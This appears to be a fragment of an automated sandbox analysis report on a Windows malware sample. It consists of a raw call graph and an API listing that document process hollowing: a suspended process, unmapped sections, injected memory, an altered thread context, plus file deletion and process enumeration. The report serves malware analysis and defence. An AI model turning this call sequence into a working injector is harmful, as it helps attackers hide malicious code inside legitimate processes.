API calls 2909->2910 2911 4038b1 CopyRect 2910->2911 2912 403e10 18 API calls 2911->2912 2913 4038d1 CopyRect 2912->2913 2914 403e10 18 API calls 2913->2914 2915 4038f1 CopyRect 2914->2915 2916 404360 18 API calls 2915->2916 2917 403911 CopyRect 2916->2917 2918 404360 18 API calls 2917->2918 2919 403931 CopyRect 2918->2919 2920 403e10 18 API calls 2919->2920 2921 403951 CopyRect 2920->2921 2922 404360 18 API calls 2921->2922 2923 403971 CopyRect 2922->2923 2924 404360 18 API calls 2923->2924 2925 403991 CopyRect 2924->2925 2926 404360 18 API calls 2925->2926 2927 4039b1 SetWindowRgn SetCapture 6CEFCE30 6CF37850 2926->2927 2928->2601 2929->2605 2930->2609 2931->2613 2932->2617 2933->2621 2934->2625 2935->2629 2936->2633 2937->2637 2938->2641 2939->2645 2940->2649 2941->2653 2942->2657 2943->2661 2944->2665 2945->2669 2946->2673 2947->2677 2948->2681 2949->2685 2950->2689 2951->2693 2952->2697 2953->2701 2954->2705 2955->2709 2956->2713 2957->2717 2958->2721 2959->2725 2960->2729 2961->2733 2962->2737 2963->2741 2964->2745 2965->2749 2966->2753 2967->2757 2968->2761 2969->2765 2970->2769 2971->2773 2972->2777 2973->2781 2974->2785 2975->2789 2976->2793 2977->2797 2978->2801 2979->2805 2980->2809 2981->2813 2982->2817 2983->2821 2984->2825 2985->2829 2986->2833 2987->2837 2988->2841 2989->2845 2990->2849 2991->2853 2992->2857 2993->2861 2994->2865 2995->2869 2996->2873 3010 4048b0 2997->3010 2999 4043a3 6CF37080 6CF37160 6CEF2DD0 3003 4044af 2999->3003 3008 40454a 2999->3008 3000 404560 CreatePolygonRgn 6CF376C0 3004 404574 CombineRgn CreatePolygonRgn 6CF376C0 CombineRgn 3000->3004 3001 4045cb CreatePolygonRgn 6CF376C0 3002 4045d9 3001->3002 3006 4045e6 6CF37850 6CF37850 6CF37850 6CF37850 3002->3006 3007 4045dd 6CEF2C70 3002->3007 3003->3008 3009 4044e9 _ftol _ftol 3003->3009 3004->3002 3006->2879 3007->3006 3008->3000 3008->3001 3009->3008 3009->3009 3010->2999 1926 40b10f __set_app_type __p__fmode __p__commode 1927 40b17e 1926->1927 1928 40b192 1927->1928 1929 40b186 __setusermatherr 1927->1929 1938 40b280 _controlfp 1928->1938 1929->1928 1931 40b197 _initterm __getmainargs _initterm 1932 40b1eb GetStartupInfoA 1931->1932 1934 40b21f GetModuleHandleA 1932->1934 1939 40b2a2 6CF04ED0 1934->1939 1937 40b243 exit _XcptFilter 1938->1931 1939->1937 2053 40ac50 TextOutA 2078 40a810 2085 409c60 6CF30310 2078->2085 2080 40a838 ReleaseCapture GetWindowRect 2081 40a863 2080->2081 2084 40a86a 2080->2084 2082 40a876 6CF309F0 2081->2082 2081->2084 2083 40a8e7 6CEFFEB0 6CF303E0 2082->2083 2084->2083 2085->2080 2086 40ac10 PtVisible 3012 40a190 3013 40a198 ReleaseCapture 3012->3013 2054 404860 2055 404871 6CEF2C70 2054->2055 2056 40487a 2054->2056 2055->2056 2087 409e20 6CF016C0 6CF37140 2088 409e64 2087->2088 2089 409f5e 2088->2089 2090 409eaf 73A24C40 6CEFE720 LPtoDP 73A24C00 6CF376C0 2088->2090 2092 409f76 GetWindowRect 6CEFE6C0 2089->2092 2091 40abe0 2 API calls 2090->2091 2093 409f19 GetMapMode 6CF38460 DPtoLP 6CF387D0 2091->2093 2101 401040 CopyRect 2092->2101 2093->2092 2096 409fc3 73A24D40 2098 40a018 6CF38160 2096->2098 2099 40a009 6CF38160 2096->2099 2097 40a028 2100 40a030 6CF37850 6CF01660 6CF015D0 2097->2100 2098->2100 2099->2100 2102 4039c0 14 API calls 2101->2102 2103 401071 CopyRect 2102->2103 2432 404670 6CF37160 6CEF2DD0 2103->2432 2105 401091 CopyRect 2106 4039c0 14 API calls 2105->2106 2107 4010b1 CopyRect 2106->2107 2108 404670 9 API calls 2107->2108 2109 4010d1 CopyRect 2108->2109 2110 4039c0 14 API calls 2109->2110 2111 4010f1 CopyRect 2110->2111 2112 404670 9 API calls 2111->2112 2113 401111 CopyRect 2112->2113 2114 4039c0 14 API calls 2113->2114 2115 401131 CopyRect 2114->2115 2116 404670 9 API calls 2115->2116 2117 401151 CopyRect 2116->2117 2118 4039c0 14 API calls 2117->2118 2119 401171 CopyRect 2118->2119 2120 404670 9 API calls 2119->2120 2121 401191 CopyRect 2120->2121 2122 4039c0 14 API calls 2121->2122 2123 4011b1 CopyRect 2122->2123 2124 404670 9 API calls 2123->2124 2125 4011d1 CopyRect 2124->2125 2126 4039c0 14 API calls 2125->2126 2127 4011f1 CopyRect 2126->2127 2128 404670 9 API calls 2127->2128 2129 401211 CopyRect 2128->2129 2130 4039c0 14 API calls 2129->2130 2131 401231 CopyRect 2130->2131 2132 404670 9 API calls 2131->2132 2133 401251 CopyRect 2132->2133 2134 4039c0 14 API calls 2133->2134 2135 401271 CopyRect 2134->2135 2136 404670 9 API calls 2135->2136 2137 401291 CopyRect 2136->2137 2138 4039c0 14 API calls 2137->2138 2139 4012b1 CopyRect 2138->2139 2140 404670 9 API calls 2139->2140 2141 4012d1 CopyRect 2140->2141 2142 4039c0 14 API calls 2141->2142 2143 4012f1 CopyRect 2142->2143 2144 404670 9 API calls 2143->2144 2145 401311 CopyRect 2144->2145 2146 4039c0 14 API calls 2145->2146 2147 401331 CopyRect 2146->2147 2148 404670 9 API calls 2147->2148 2149 401351 CopyRect 2148->2149 2150 4039c0 14 API calls 2149->2150 2151 401371 CopyRect 2150->2151 2152 404670 9 API calls 2151->2152 2153 401391 CopyRect 2152->2153 2154 4039c0 14 API calls 2153->2154 2155 4013b1 CopyRect 2154->2155 2156 404670 9 API calls 2155->2156 2157 4013d1 CopyRect 2156->2157 2158 4039c0 14 API calls 2157->2158 2159 4013f1 CopyRect 2158->2159 2160 404670 9 API calls 2159->2160 2161 401411 CopyRect 2160->2161 2162 4039c0 14 API calls 2161->2162 2163 401431 CopyRect 2162->2163 2164 404670 9 API calls 2163->2164 2165 401451 CopyRect 2164->2165 2166 4039c0 14 API calls 2165->2166 2167 401471 CopyRect 2166->2167 2168 404670 9 API calls 2167->2168 2169 401491 CopyRect 2168->2169 2170 4039c0 14 API calls 2169->2170 2171 4014b1 CopyRect 2170->2171 2172 404670 9 API calls 2171->2172 2173 4014d1 CopyRect 2172->2173 2174 4039c0 14 API calls 2173->2174 2175 4014f1 CopyRect 2174->2175 2176 404670 9 API calls 2175->2176 2177 401511 CopyRect 2176->2177 2178 4039c0 14 API calls 2177->2178 2179 401531 CopyRect 2178->2179 2180 404670 9 API calls 2179->2180 2181 401551 CopyRect 2180->2181 2182 4039c0 14 API calls 2181->2182 2183 401571 CopyRect 2182->2183 2184 404670 9 API calls 2183->2184 2185 401591 CopyRect 2184->2185 2186 4039c0 14 API calls 2185->2186 2187 4015b1 CopyRect 2186->2187 2188 404670 9 API calls 2187->2188 2189 4015d1 CopyRect 2188->2189 2190 4039c0 14 API calls 2189->2190 2191 4015f1 CopyRect 2190->2191 2192 404670 9 API calls 2191->2192 2193 401611 CopyRect 2192->2193 2194 4039c0 14 API calls 2193->2194 2195 401631 CopyRect 2194->2195 2196 404670 9 API calls 2195->2196 2197 401651 CopyRect 2196->2197 2198 4039c0 14 API calls 2197->2198 2199 401671 CopyRect 2198->2199 2200 404670 9 API calls 2199->2200 2201 401691 CopyRect 2200->2201 2202 4039c0 14 API calls 2201->2202 2203 4016b1 CopyRect 2202->2203 2204 404670 9 API calls 2203->2204 2205 4016d1 CopyRect 2204->2205 2206 4039c0 14 API calls 2205->2206 2207 4016f1 CopyRect 2206->2207 2208 404670 9 API calls 2207->2208 2209 401711 CopyRect 2208->2209 2210 4039c0 14 API calls 2209->2210 2211 401731 CopyRect 2210->2211 2212 404670 9 API calls 2211->2212 2213 401751 CopyRect 2212->2213 2214 4039c0 14 API calls 2213->2214 2215 401771 CopyRect 2214->2215 2216 404670 9 API calls 2215->2216 2217 401791 CopyRect 2216->2217 2218 4039c0 14 API calls 2217->2218 2219 4017b1 CopyRect 2218->2219 2220 404670 9 API calls 2219->2220 2221 4017d1 CopyRect 2220->2221 2222 4039c0 14 API calls 2221->2222 2223 4017f1 CopyRect 2222->2223 2224 404670 9 API calls 2223->2224 2225 401811 CopyRect 2224->2225 2226 4039c0 14 API calls 2225->2226 2227 401831 CopyRect 2226->2227 2228 404670 9 API calls 2227->2228 2229 401851 CopyRect 2228->2229 2230 4039c0 14 API calls 2229->2230 2231 401871 CopyRect 2230->2231 2232 404670 9 API calls 2231->2232 2233 401891 CopyRect 2232->2233 2234 4039c0 14 API calls 2233->2234 2235 4018b1 CopyRect 2234->2235 2236 404670 9 API calls 2235->2236 2237 4018d1 CopyRect 2236->2237 2238 4039c0 14 API calls 2237->2238 2239 4018f1 CopyRect 2238->2239 2240 404670 9 API calls 2239->2240 2241 401911 CopyRect 2240->2241 2242 4039c0 14 API calls 2241->2242 2243 401931 CopyRect 2242->2243 2244 404670 9 API calls 2243->2244 2245 401951 CopyRect 2244->2245 2246 4039c0 14 API calls 2245->2246 2247 401971 CopyRect 2246->2247 2248 404670 9 API calls 2247->2248 2249 401991 CopyRect 2248->2249 2250 4039c0 14 API calls 2249->2250 2251 4019b1 CopyRect 2250->2251 2252 404670 9 API calls 2251->2252 2253 4019d1 CopyRect 2252->2253 2254 4039c0 14 API calls 2253->2254 2255 4019f1 CopyRect 2254->2255 2256 404670 9 API calls 2255->2256 2257 401a11 CopyRect 2256->2257 2258 4039c0 14 API calls 2257->2258 2259 401a31 CopyRect 2258->2259 2260 404670 9 API calls 2259->2260 2261 401a51 CopyRect 2260->2261 2262 4039c0 14 API calls 2261->2262 2263 401a71 CopyRect 2262->2263 2264 404670 9 API calls 2263->2264 2265 401a91 CopyRect 2264->2265 2266 4039c0 14 API calls 2265->2266 2267 401ab1 CopyRect 2266->2267 2268 404670 9 API calls 2267->2268 2269 401ad1 CopyRect 2268->2269 2270 4039c0 14 API calls 2269->2270 2271 401af1 CopyRect 2270->2271 2272 404670 9 API calls 2271->2272 2273 401b11 CopyRect 2272->2273 2274 4039c0 14 API calls 2273->2274 2275 401b31 CopyRect 2274->2275 2276 404670 9 API calls 2275->2276 2277 401b51 CopyRect 2276->2277 2278 4039c0 14 API calls 2277->2278 2279 401b71 CopyRect 2278->2279 2280 404670 9 API calls 2279->2280 2281 401b91 CopyRect 2280->2281 2282 4039c0 14 API calls 2281->2282 2283 401bb1 CopyRect 2282->2283 2284 404670 9 API calls 2283->2284 2285 401bd1 CopyRect 2284->2285 2286 4039c0 14 API calls 2285->2286 2287 401bf1 CopyRect 2286->2287 2288 404670 9 API calls 2287->2288 2289 401c11 CopyRect 2288->2289 2290 4039c0 14 API calls 2289->2290 2291 401c31 CopyRect 2290->2291 2292 404670 9 API calls 2291->2292 2293 401c51 CopyRect 2292->2293 2294 4039c0 14 API calls 2293->2294 2295 401c71 CopyRect 2294->2295 2296 404670 9 API calls 2295->2296 2297 401c91 CopyRect 2296->2297 2298 4039c0 14 API calls 2297->2298 2299 401cb1 CopyRect 2298->2299 2300 404670 9 API calls 2299->2300 2301 401cd1 CopyRect 2300->2301 2302 4039c0 14 API calls 2301->2302 2303 401cf1 CopyRect 2302->2303 2304 404670 9 API calls 2303->2304 2305 401d11 CopyRect 2304->2305 2306 4039c0 14 API calls 2305->2306 2307 401d31 CopyRect 2306->2307 2308 404670 9 API calls 2307->2308 2309 401d51 CopyRect 2308->2309 2310 4039c0 14 API calls 2309->2310 2311 401d71 CopyRect 2310->2311 2312 404670 9 API calls 2311->2312 2313 401d91 CopyRect 2312->2313 2314 4039c0 14 API calls 2313->2314 2315 401db1 CopyRect 2314->2315 2316 404670 9 API calls 2315->2316 2317 401dd1 CopyRect 2316->2317 2318 4039c0 14 API calls 2317->2318 2319 401df1 CopyRect 2318->2319 2320 404670 9 API calls 2319->2320 2321 401e11 CopyRect 2320->2321 2322 4039c0 14 API calls 2321->2322 2323 401e31 CopyRect 2322->2323 2324 404670 9 API calls 2323->2324 2325 401e51 CopyRect 2324->2325 2326 4039c0 14 API calls 2325->2326 2327 401e71 CopyRect 2326->2327 2328 404670 9 API calls 2327->2328 2329 401e91 CopyRect 2328->2329 2330 4039c0 14 API calls 2329->2330 2331 401eb1 CopyRect 2330->2331 2332 404670 9 API calls 2331->2332 2333 401ed1 CopyRect 2332->2333 2334 4039c0 14 API calls 2333->2334 2335 401ef1 CopyRect 2334->2335 2336 404670 9 API calls 2335->2336 2337 401f11 CopyRect 2336->2337 2338 4039c0 14 API calls 2337->2338 2339 401f31 CopyRect 2338->2339 2340 404670 9 API calls 2339->2340 2341 401f51 CopyRect 2340->2341 2342 4039c0 14 API calls 2341->2342 2343 401f71 CopyRect 2342->2343 2344 404670 9 API calls 2343->2344 2345 401f91 CopyRect 2344->2345 2346 4039c0 14 API calls 2345->2346 2347 401fb1 CopyRect 2346->2347 2348 404670 9 API calls 2347->2348 2349 401fd1 CopyRect 2348->2349 2350 4039c0 14 API calls 2349->2350 2351 401ff1 CopyRect 2350->2351 2352 404670 9 API calls 2351->2352 2353 402011 CopyRect 2352->2353 2354 4039c0 14 API calls 2353->2354 2355 402031 CopyRect 2354->2355 2356 404670 9 API calls 2355->2356 2357 402051 CopyRect 2356->2357 2358 4039c0 14 API calls 2357->2358 2359 402071 CopyRect 2358->2359 2360 404670 9 API calls 2359->2360 2361 402091 CopyRect 2360->2361 2362 4039c0 14 API calls 2361->2362 2363 4020b1 CopyRect 2362->2363 2364 404670 9 API calls 2363->2364 2365 4020d1 CopyRect 2364->2365 2366 4039c0 14 API calls 2365->2366 2367 4020f1 CopyRect 2366->2367 2368 404670 9 API calls 2367->2368 2369 402111 CopyRect 2368->2369 2370 4039c0 14 API calls 2369->2370 2371 402131 CopyRect 2370->2371 2372 404670 9 API calls 2371->2372 2373 402151 CopyRect 2372->2373 2374 4039c0 14 API calls 2373->2374 2375 402171 CopyRect 2374->2375 2376 404670 9 API calls 2375->2376 2377 402191 CopyRect 2376->2377 2378 4039c0 14 API calls 2377->2378 2379 4021b1 CopyRect 2378->2379 2380 4039c0 14 API calls 2379->2380 2381 4021d1 CopyRect 2380->2381 2440 4040f0 6CF37080 6CF37160 6CEF2DD0 2381->2440 2383 4021f1 CopyRect 2384 4039c0 14 API calls 2383->2384 2385 402211 CopyRect 2384->2385 2386 4040f0 14 API calls 2385->2386 2387 402231 CopyRect 2386->2387 2388 4039c0 14 API calls 2387->2388 2389 402251 CopyRect 2388->2389 2390 4040f0 14 API calls 2389->2390 2391 402271 CopyRect 2390->2391 2392 4040f0 14 API calls 2391->2392 2393 402291 CopyRect 2392->2393 2394 4039c0 14 API calls 2393->2394 2395 4022b1 CopyRect 2394->2395 2396 4040f0 14 API calls 2395->2396 2397 4022d1 CopyRect 2396->2397 2398 4039c0 14 API calls 2397->2398 2399 4022f1 CopyRect 2398->2399 2400 4040f0 14 API calls 2399->2400 2401 402311 CopyRect 2400->2401 2402 4039c0 14 API calls 2401->2402 2403 402331 CopyRect 2402->2403 2404 4040f0 14 API calls 2403->2404 2405 402351 CopyRect 2404->2405 2406 4040f0 14 API calls 2405->2406 2407 402371 CopyRect 2406->2407 2408 4040f0 14 API calls 2407->2408 2409 402391 CopyRect 2408->2409 2410 4039c0 14 API calls 2409->2410 2411 4023b1 CopyRect 2410->2411 2412 4039c0 14 API calls 2411->2412 2413 4023d1 CopyRect 2412->2413 2414 4040f0 14 API calls 2413->2414 2415 4023f1 CopyRect 2414->2415 2416 4039c0 14 API calls 2415->2416 2417 402411 CopyRect 2416->2417 2418 4039c0 14 API calls 2417->2418 2419 402431 CopyRect 2418->2419 2420 4040f0 14 API calls 2419->2420 2421 402451 CopyRect 2420->2421 2422 4040f0 14 API calls 2421->2422 2423 402471 CopyRect 2422->2423 2424 4039c0 14 API calls 2423->2424 2425 402491 CopyRect 2424->2425 2426 4040f0 14 API calls 2425->2426 2427 4024b1 CopyRect 2426->2427 2428 4040f0 14 API calls 2427->2428 2429 4024d1 CopyRect 2428->2429 2430 4040f0 14 API calls 2429->2430 2431 4024f1 6CEFFEB0 2430->2431 2431->2096 2431->2097 2433 404748 2432->2433 2434 404809 2432->2434 2435 404816 6CF37850 2433->2435 2437 4047dc 6CF381F0 Polyline 6CF381F0 2433->2437 2438 404776 _ftol _ftol 2433->2438 2434->2435 2436 40480d 6CEF2C70 2434->2436 2435->2105 2436->2435 2437->2434 2438->2438 2439 4047d8 2438->2439 2439->2437 2441 4042f9 2440->2441 2444 404208 2440->2444 2442 404306 6CF37850 6CF37850 2441->2442 2443 4042fd 6CEF2C70 2441->2443 2442->2383 2443->2442 2444->2441 2444->2442 2445 40429d 6 API calls 2444->2445 2446 40423e _ftol _ftol 2444->2446 2445->2441 2446->2446 2447 404299 2446->2447 2447->2445 3014 4057a0 6CEF39C0 3015 40a7a0 GetWindowRect 6CEFE6C0 3016 404ec0 28 API calls 3015->3016 3017 40a7e1 SetCapture 6CEFCE30 6CEFFEB0 3016->3017 3018 40ada0 EnableWindow 2057 40b261 _exit 2573 40b2e3 2574 40b2e8 2573->2574 2577 40b2ba 6CEF50F0 2574->2577 2578 40b2d4 _setmbcp 2577->2578 2579 40b2dd 2577->2579 2578->2579 2452 40ac30 RectVisible 2059 40a170 2064 40a090 2059->2064 2061 40a178 2062 40a188 2061->2062 2063 40a17f 6CEF2C70 2061->2063 2063->2062 2065 40a120 2064->2065 2066 40a0c8 73A24D40 2064->2066 2068 40a126 6CF37850 6CF01660 2065->2068 2069 40a111 6CF38160 2066->2069 2070 40a105 6CF38160 2066->2070 2068->2061 2069->2068 2070->2068 1698 405830 1701 40a1b0 6CF30310 6CEF50F0 6CEFF390 LoadIconA 1698->1701 1700 405856 6CF309F0 6CF303E0 1701->1700 2058 40ad70 Escape 3019 40acb0 TabbedTextOutA 2453 404930 6CF37850 2454 40ad30 2455 40ad38 2454->2455 2456 40ad3b GrayStringA 2454->2456 2455->2456 2580 4057f0 2581 4057f5 2580->2581 2584 40b0c8 2581->2584 2587 40b09c 2584->2587 2586 40581a 2588 40b0b1 __dllonexit 2587->2588 2589 40b0a5 _onexit 2587->2589 2588->2586 2589->2586
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(0000006B,?), ref: 004074E7
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004074EA
                                                                                          • LoadLibraryA.KERNEL32(0000006B,?), ref: 004074FD
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00407500
                                                                                          • LoadLibraryA.KERNEL32(0000006B,Clos), ref: 00407563
                                                                                          • LoadLibraryA.KERNELBASE(00000073,StcF), ref: 0040764D
                                                                                          • LoadLibraryA.KERNEL32(00000073,StcF), ref: 00407666
                                                                                          • LoadLibraryA.KERNEL32(advapi,00000052), ref: 0040767C
                                                                                          • LoadLibraryA.KERNEL32(advapi,00000052), ref: 0040768F
                                                                                          • LoadLibraryA.KERNEL32(advapi,RuV), ref: 0040769F
                                                                                          • LoadLibraryA.KERNEL32(advapi,RuV), ref: 004076B5
                                                                                          • LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076C5
                                                                                          • LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076D5
                                                                                          • LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076E5
                                                                                          • LoadLibraryA.KERNEL32(0000006B,?), ref: 004077AC
                                                                                          • LoadLibraryA.KERNEL32(0000006B,?), ref: 004077BC
                                                                                          • LoadLibraryA.KERNEL32(advapi,0000004F), ref: 004077CC
                                                                                          • LoadLibraryA.KERNEL32(advapi,?), ref: 004077E2
                                                                                          • LoadLibraryA.KERNEL32(advapi,Allocat), ref: 004077F8
                                                                                          • LoadLibraryA.KERNEL32(advapi,EqualSid), ref: 0040780E
                                                                                          • LoadLibraryA.KERNEL32(advapi,LookupAccountSidA), ref: 00407824
                                                                                          • LoadLibraryA.KERNEL32(0000006B,Clos), ref: 0040783A
                                                                                          • LoadLibraryA.KERNEL32(0000006B,?), ref: 0040784A
                                                                                          • LoadLibraryA.KERNEL32(0000006B,?), ref: 00407860
                                                                                          • LoadLibraryA.KERNEL32(0000006B,Clos), ref: 00407876
                                                                                          • LoadLibraryA.KERNELBASE(psapi.dll,?), ref: 00407A43
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00407AFB
                                                                                          • wcscpy.MSVCRT ref: 00407B17
                                                                                          • wcscpy.MSVCRT ref: 00407F50
                                                                                          • wcscat.MSVCRT ref: 00407F7A
                                                                                          • wcscpy.MSVCRT ref: 00407F8A
                                                                                          • wcscat.MSVCRT ref: 00407F9E
                                                                                          • wcscat.MSVCRT ref: 00408144
                                                                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040817F
                                                                                          • Wow64GetThreadContext.KERNEL32 ref: 004081A2
                                                                                          • NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 004081BE
                                                                                          • NtUnmapViewOfSection.NTDLL(?,?), ref: 004081CF
                                                                                          • NtUnmapViewOfSection.NTDLL(?,?), ref: 004081E0
                                                                                          • NtUnmapViewOfSection.NTDLL(?,?), ref: 004081FF
                                                                                          • NtUnmapViewOfSection.NTDLL(?,?), ref: 0040820D
                                                                                          • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00408288
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 004082BF
                                                                                          • VirtualAllocEx.KERNELBASE(?,-FFF00000,00100000,00003000,00000040,?,00003000,00000040), ref: 004082EE
                                                                                          • WriteProcessMemory.KERNEL32(?,00000000,.dll,00000190,00000000,?,00003000,00000040), ref: 00408306
                                                                                          • WriteProcessMemory.KERNELBASE(?,00000000,.dll,?,00000000,?,00003000,00000040), ref: 00408317
                                                                                          • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?,00003000,00000040), ref: 00408353
                                                                                          • WriteProcessMemory.KERNELBASE(?,0000002E,0000006B,?,00000000,?,00003000,00000040), ref: 004083C0
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,00000004,?,?,00003000,00000040), ref: 004083F5
                                                                                          • Wow64SetThreadContext.KERNEL32(?,00010007,?,00003000,00000040), ref: 0040841A
                                                                                          • WriteProcessMemory.KERNELBASE(?,00000050,?,00000004,00000000,?,00003000,00000040), ref: 00408480
                                                                                          • ResumeThread.KERNELBASE(?,?,00003000,00000040), ref: 00408486
                                                                                          • Wow64SuspendThread.KERNEL32(?,?,00003000,00000040), ref: 00408490
                                                                                          • WriteProcessMemory.KERNELBASE(?,00000050,?,00000004,00000000,?,00003000,00000040), ref: 004084B5
                                                                                          • wcscpy.MSVCRT ref: 00408760
                                                                                          • wcscat.MSVCRT ref: 00408774
                                                                                          • MoveFileExW.KERNELBASE(?,?,00000008), ref: 0040878D
                                                                                          • CopyFileW.KERNELBASE(?,?,00000000), ref: 004087A3
                                                                                          • ResumeThread.KERNELBASE(?), ref: 004087FC
                                                                                          • Sleep.KERNELBASE(00000002), ref: 00408815
                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 00408837
                                                                                          • Module32First.KERNEL32(00000000,00000000), ref: 004088AC
                                                                                          • strstr.MSVCRT ref: 004088D6
                                                                                          • Wow64SuspendThread.KERNEL32(?), ref: 00408904
                                                                                          • Wow64SuspendThread.KERNEL32(?), ref: 0040891F
                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408926
                                                                                          • DeleteFileW.KERNELBASE(?), ref: 00408930
                                                                                          • ResumeThread.KERNELBASE(?), ref: 00408949
                                                                                          • Sleep.KERNELBASE(00000002), ref: 0040894D
                                                                                          • DeleteFileW.KERNELBASE(?), ref: 00408956
                                                                                          • Wow64SuspendThread.KERNEL32(?), ref: 0040897B
                                                                                          • Sleep.KERNELBASE(00000005), ref: 0040898A
                                                                                          • MoveFileExW.KERNELBASE(?,?,00000008), ref: 0040899C
                                                                                          • ResumeThread.KERNELBASE(?,?,00003000,00000040), ref: 004089B3
                                                                                          • wcscat.MSVCRT ref: 00408A5B
                                                                                          • wcsstr.MSVCRT ref: 00408A82
                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408AA2
                                                                                          • TerminateProcess.KERNELBASE(00000000), ref: 00408AD9
                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000002,00000000,00000000), ref: 00408C6D
                                                                                          • CreateFileW.KERNELBASE(00000000,40000000,00000002,00000000,00000003,00000000,00000000), ref: 00408C8E
                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408CAF
                                                                                          • CreateFileW.KERNELBASE(00000000,40000000,00000002,00000000,00000005,00000000,00000000), ref: 00408CD2
                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408CE1
                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00408D72
                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 00408DDC
                                                                                          • strstr.MSVCRT ref: 00408E02
                                                                                          • strstr.MSVCRT ref: 00408E16
                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408E2E
                                                                                          • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408FB8
                                                                                          • CreateFileA.KERNELBASE(00000000,00000000,00000002,00000000,00000003,00000000,00000000), ref: 00408FDA
                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409030
                                                                                          • wcslen.MSVCRT ref: 00409045
                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040906E
                                                                                          • wcscat.MSVCRT ref: 004090E9
                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409108
                                                                                          • VirtualAlloc.KERNELBASE(00000000,-00000400,00003000,00000040), ref: 0040912D
                                                                                          • ReadFile.KERNELBASE(?,.dll,00000000), ref: 00409151
                                                                                          • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 004091BD
                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000040), ref: 00409294
                                                                                          • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 004099EB
                                                                                          • Sleep.KERNELBASE(00000320), ref: 004099F6
                                                                                          • TerminateProcess.KERNELBASE(?,00000000), ref: 004099FF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad$File$Create$Process$Thread$Memory$Write$VirtualWow64wcscat$Alloc$ChangeCloseFindNotificationResumeSectionSleepSuspendUnmapViewwcscpy$strstr$AddressContextDeleteFirstMoveProcReadSnapshotTerminateToolhelp32$CopyModuleModule32NameProcess32wcslenwcsstr
                                                                                          • String ID: $ $ $ $ $ $ $ /c $"$"$"$"$"$"$"$"$",1$'$($)$.$.$.$.$.$.$.$.$.$.$.$.$.dll$/$/$/$0$0$0$2$2$2$2$2$2$2$2$2$2$4$5$5$7$7$<$<$<$<$<$=$>$>$>$>$>$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$Allocat$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$Clos$CopyFil$D$D$D$D$D$Dtl$Duplicat$E$E$E$E$E$E$E$E$E$EqualSid$ExitProc$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$I$I$I$I$IsWow64Proc$L$L$LookupAccountSidA$M$M$M$M$M$M$M$M$M$M$Modul$Modul$Mov$N$N$N$N$N$NtR$NtUnmapVi$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$Proc$Proc$Program 